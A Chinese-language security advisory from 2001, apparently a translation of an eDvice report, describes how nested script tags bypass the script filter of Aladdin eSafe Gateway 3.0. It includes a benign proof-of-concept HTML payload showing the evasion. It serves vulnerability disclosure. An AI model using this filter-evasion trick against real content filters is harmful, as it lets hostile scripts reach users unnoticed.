安全研究
安全漏洞
Aladdin eSafe Gateway 脚本过滤漏洞
发布日期:2001-05-22
更新日期:2001-05-22
受影响系统:
Aladdin eSafe Gateway vesrsion 3.0(或更低版本)
描述:
eSafe Gateway 3.0是一个基于内容过滤的安全产品。用户可以配置eSafe Gateway
来从进入的HTML文档中删除脚本(VBScripts, JavaScripts)和其他的可执行标记。
然而,通过特别构造HTML文件,攻击者可以轻易地绕过eSafe的脚本过滤机制。
<*来源:eDvice Security Services (
support@edvicetech.com)
主页地址:
http://www.edvicetech.com
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
如果发送如下的HTML代码:
----------------------
<HTML><HEAD></HEAD>
<BODY>
<SCRIPT language="JavaScript">
alert("hi");
</SCRIPT>
</BODY></HTML>
当上面的代码通过eSafe过滤引擎时,脚本将会被过滤,变成下列格式:
<HTML><HEAD></HEAD>
<BODY>
</BODY></HTML>
然而,如果我们使用下列代码:
<HTML><HEAD></HEAD>
<BODY>
<SCRIPT<script language="javascript"> </script> language="javascript">
alert("hi");
</SCRIPT>
</BODY></HTML>
由于内部的脚本会被过滤,则最后剩下的是这样的代码:
<HTML><HEAD></HEAD>
<BODY>
<SCRIPT language="javascript">
alert("hi");
</SCRIPT>
</BODY></HTML>
这就产生了一个有效的脚本代码。
建议:
临时解决方法:
在此问题被修复之前不要依赖eSafe的过滤机制。
厂商补丁:
暂无
厂商主页地址:
www.ealaddin.com
浏览次数:3904
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载 绿盟科技给您安全的保障 |